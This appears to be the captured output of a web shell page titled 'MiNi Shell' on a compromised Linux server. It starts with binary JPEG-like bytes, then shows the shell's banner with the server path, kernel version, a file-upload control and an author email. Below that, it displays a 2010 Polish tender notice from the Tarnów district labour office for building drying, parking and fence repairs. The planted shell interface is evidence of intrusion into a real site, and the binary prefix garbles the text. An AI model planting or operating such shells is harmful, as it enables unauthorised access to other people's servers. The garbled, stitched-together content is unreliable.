JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100618/174346-N-2010.html

<p class="kh_header"><b>Tarnów: Przedmiotem zamówienia jest wykonanie: 
1) robót związanych z osuszaniem i izolacją ścian piwnic i parteru - II etap prac w budynku Powiatowego Urzędu Pracy w Tarnowie,
 2) remontu placu parkingowego,
 3) remontu ogrodzenia.</b><br>
<b>Numer ogłoszenia: 174346 - 2010; data zamieszczenia: 18.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Tarnowie , pl. J. Bema 3, 33-100 Tarnów, woj. małopolskie, tel. 014 6882300, faks 014 6882301.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest wykonanie: 
1) robót związanych z osuszaniem i izolacją ścian piwnic i parteru - II etap prac w budynku Powiatowego Urzędu Pracy w Tarnowie,
 2) remontu placu parkingowego,
 3) remontu ogrodzenia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie: 
1) robót związanych z osuszaniem i izolacją ścian piwnic i parteru - II etap prac w budynku Powiatowego Urzędu Pracy w Tarnowie,
2) remontu placu parkingowego,
3) remontu ogrodzenia.
2.  Sposób wykonania ww. robót budowlanych określono szczegółowo w:
1) dokumentacji projektowej - załącznik nr 1, 
2) przedmiarze robót - załącznik nr 2,
3) specyfikacji technicznej wykonania i odbioru robót budowlanych - 
załącznik nr 3, 
Przedmiot zamówienia należy wykonać z materiałów określonych w dokumentacji projektowej. Ilekroć przedmiot zamówienia jest opisany ze wskazaniem znaków towarowych, patentów lub pochodzenia, to przyjmuje się, że wskazaniom takim towarzyszą wyrazy - lub równoważne. Zamawiający dopuszcza składanie ofert 
z zastosowaniem innych materiałów o nie gorszych parametrach 
od zaprojektowanych i jakości potwierdzonej certyfikatem.
Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego materiały spełniają wymagania określone przez Zamawiającego. Ciężar udowodnienia, że materiał jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na Wykonawcy.   
     
3.  Roboty wykonane będą z materiałów Wykonawcy.
     
Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
KOD - 45453000-7
OPIS-  Roboty remontowe i renowacyjne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 57.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> WYMAGANIA DOTYCZĄCE WADIUM.

1. Zamawiający wymaga wniesienia wadium w wysokości 5 000,00 zł w terminie 
      wyznaczonym do składania ofert. Wadium może być wniesione w formach określonych 
      w art. 45 ust. 6 ustawy Prawo zamówień publicznych.
2.  Wadium w pieniądzu należy wpłacić na rachunek bankowy: w BGK O/Tarnów 
      nr 38 1130 1235 0012 1086 4620 0018 z zaznaczeniem na dowodzie wpłaty: /Wadium- 
      osuszanie budynku/. Kopię dowodu wpłaty należy dołączyć do oferty.
3.  W przypadku wyboru innej formy wniesienia wadium niż pieniądz oryginał dokumentu 
       należy złożyć do daty upływu terminu składania ofert w Powiatowym Urzędzie  Pracy 
       w Tarnowie, pl. gen. J. Bema 3  w pokoju nr 202 (II piętro).
       Kopię dokumentu potwierdzającego wniesienie wadium należy dołączyć do oferty.
4.  Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty
      najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego 
      oferta została wybrana jako najkorzystniejsza.
5.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci 
      wadium niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia należytego 
      wykonania umowy.
6.  Zamawiający zwróci niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę 
     przed upływem terminu składania ofert. 
7. Zamawiający zażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono 
    wadium na podstawie ust. 4, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta 
    zostanie wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie 
     określonym przez Zamawiającego.      
8. Wadium wniesione w pieniądzu Zamawiający zwróci wraz z odsetkami wynikającymi 
     z umowy rachunku bankowego, na którym było przechowywane, pomniejszone o koszty 
     prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy 
     na rachunek bankowy wskazany przez Wykonawcę.
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi 
     na wezwanie, o którym mowa w art. 26 ust. 3 nie złożył dokumentów lub oświadczeń 
     o których mowa w art. 25 ust. 1 lub pełnomocnictwa, chyba że udowodni, że wynika 
     to z przyczyn nieleżących po jego stronie.    
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta 
     została wybrana :    
    1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
         określonych w ofercie,
    2) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
    3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
        leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie zgodne z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r.  Prawo zamówień publicznych - załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Wykonawca musi posiadać doświadczenie     
     polegające na wykonaniu w okresie ostatnich pięciu lat przed upływem terminu składania 
     ofert, a jeżeli okres prowadzenia działalności jest krótszy,  - w tym okresie, minimum 
     trzech robót budowlanych związanych z osuszaniem budynków o wartości minimum   
     300 000,00 zł każda.W celu potwierdzenia spełniania warunku, o którym mowa w rozdziale V ust. 1 pkt 2    
     oferta musi zawierać :
wykaz wykonanych robót budowlanych związanych z osuszaniem budynków w okresie 
     ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia 
     działalności jest krótszy,  - w tym okresie, o wartości minimum   300 000,00 zł, 
     z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem 
     dokumentów (np. referencji, opinii zamawiających na rzecz których zamówienia zostały 
     zrealizowane) potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki 
     budowlanej i prawidłowo ukończone -  załącznik nr 5.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie zgodne z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r.  Prawo zamówień publicznych - załącznik nr 4.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Wykonawca musi dysponować co najmniej 1 osobą posiadającą uprawnienia budowlane do  kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno - budowlanej. Osoba ta musi posiadać 
co najmniej 5 letnie doświadczenie zawodowe w kierowaniu budową oraz musi być wpisana na listę członków właściwej izby samorządu zawodowego. Osoba ta będzie pełniła funkcję kierownika robót.    
W celu potwierdzenia spełniania warunku, o którym mowa w rozdziale V ust. 1 pkt 3    oferta musi zawierać :
      - wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, posiadających  
       uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń 
       w specjalności konstrukcyjno - budowlanej wraz z informacjami dotyczącymi: 
       wykształcenia, doświadczenia zawodowego, zakresu wykonywanych czynności, 
      posiadanych uprawnień oraz o podstawie dysponowania tymi osobami -  załącznik  nr 6.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania tego warunku Wykonawca musi:
      a) posiadać środki finansowe lub zdolność kredytową minimum na kwotę 300 000,00 zł,
      b) być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 
działalności 
W celu potwierdzenia spełniania warunku, o którym mowa w rozdziale V ust. 1 pkt 4    
     oferta musi zawierać :
    1) informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, potwierdzającą,   
       że Wykonawca posiada środki finansowe lub zdolność kredytową minimum na kwotę  
       300 000,00 zł.  
       Ww. dokument nie może być wystawiony wcześniej niż 3 miesiące przed upływem 
        terminu składania ofert.
     2) opłaconą polisę, a w przypadku jej braku inny dokument ubezpieczenia potwierdzający, 
         że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie 
        prowadzonej działalności związanej z przedmiotem zamówienia minimum na kwotę 
        1 000 000,00 zł. 

           minimum na kwotę 1 000 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy- załącznik nr 8,
    2) wypełniony kosztorys na podstawie załączonego przedmiaru robót, 
    3)  podpisany projekt umowy - załącznik nr 9,
    4) oświadczenie dotyczące powierzenia części zamówienia podwykonawcom - załącznik   
         nr 10,
    5) oświadczenie, że materiały jakie będą użyte do wykonania zamówienia są dopuszczone 
         do obrotu i stosowania, tzn. będą posiadały certyfikaty na znak bezpieczeństwa bądź 
         aprobaty techniczne oraz świadectwa jakości - załącznik nr 11,  
    6) Pełnomocnictwo do reprezentacji Wykonawcy w postępowaniu o zamówienie publiczne,  
        jeżeli oferta składana jest przez pełnomocnika. Treść pełnomocnictwa musi   
        jednoznacznie określać czynności, co do wykonania których pełnomocnik jest 
        upoważniony,
     7) Dowód wniesienia wadium,
     8) Dokument, z którego będzie wynikało uprawnienie do podpisania oferty np. aktualny 
          odpis z właściwego rejestru, zaświadczenie o wpisie do ewidencji działalności 
          gospodarczej, statut, rejestr handlowy itp. 

W przypadku korzystania z zasobów innych podmiotów Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia w tym celu należy przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Wymagane dokumenty należy złożyć w formie oryginału lub kserokopii poświadczonej 
za zgodność z oryginałem przez Wykonawcę lub upoważnionego pełnomocnika.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.90</li>
<li>2 - Termin wykonania zamówienia - 0.10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zamawiający dopuszcza zmianę osób, które będą uczestniczyć w wykonaniu zamówienia w stosunku do treści oferty pod warunkiem, że zaproponowane osoby będą spełniały warunki opisane w niniejszej specyfikacji. 
2. Zamawiający musi wyrazić zgodę na wprowadzenie zmian.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.up.tarnow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3,  (pok. 201)
II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.07.2010 godzina 13:00, miejsce: Powiatowy Urząd Pracy w Tarnowie, pl. gen. J. Bema 3, sekretariat (pok. 214)
II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com